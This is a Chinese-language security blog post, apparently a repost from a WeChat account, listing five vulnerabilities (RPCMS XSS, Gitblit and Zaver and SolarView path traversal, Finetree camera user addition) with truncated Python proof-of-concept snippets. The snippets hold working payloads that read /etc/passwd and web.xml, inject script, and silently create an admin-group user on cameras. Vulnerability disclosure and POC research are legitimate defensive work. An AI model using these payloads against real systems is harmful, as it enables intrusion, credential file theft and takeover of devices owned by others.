Vulnerabilities
RPCMS 跨站脚本攻击 | CVE-2022-41473
文 章: https://henry4e36.top/index.php/archives/110.html
POC:
......payload = {baseurl} + "/search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",}try:res = requests.get(url=payload, headers=headers, verify=False, timeout=5)......
Gitblit 路径遍历漏洞 | CVE-2022-31268
文 章: https://henry4e36.top/index.php/archives/88.html
POC:
......payload = self.url + "/resources//../WEB-INF/web.xml"try:res = requests.get(url=payload, headers=headers, verify=False, timeout=5)......
Finetree 5MP 摄像机任意用户添加 | CNVD-2021-42372
文 章: https://cn-sec.com/archives/404349.html
POC:
......payload = self.url + "/quicksetup/user_update.php"headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0","Content-Type": "application/x-www-form-urlencoded"}username = ''.join(random.sample("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",8))passwd = ''.join(random.sample("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_.1234567890!@#",8))data = f"method=add&user={username}&pwd={passwd}&group=3&ptz_enable=0"try:res = requests.post(url=payload, headers=headers, data=data, verify=False, timeout=5)......
Zaver 任意文件读取 | CVE-2022-38794
文 章: https://github.com/zyearn/zaver/issues/22
POC:
......payload = self.url + "/../../../../../../../../etc/passwd"try:res = requests.get(url=payload, headers=headers, verify=False, timeout=5)......
SolarView Compact 路径遍历漏洞 | CVE-2022-29298
文 章: https://henry4e36.top/index.php/archives/121.html
POC:
......payload = self.url + "/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg"try:res = requests.get(url=payload, headers=headers, verify=False, timeout=5)......
原文始发于微信公众号(才疏学浅的H6):Weekly vulnerabilities
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论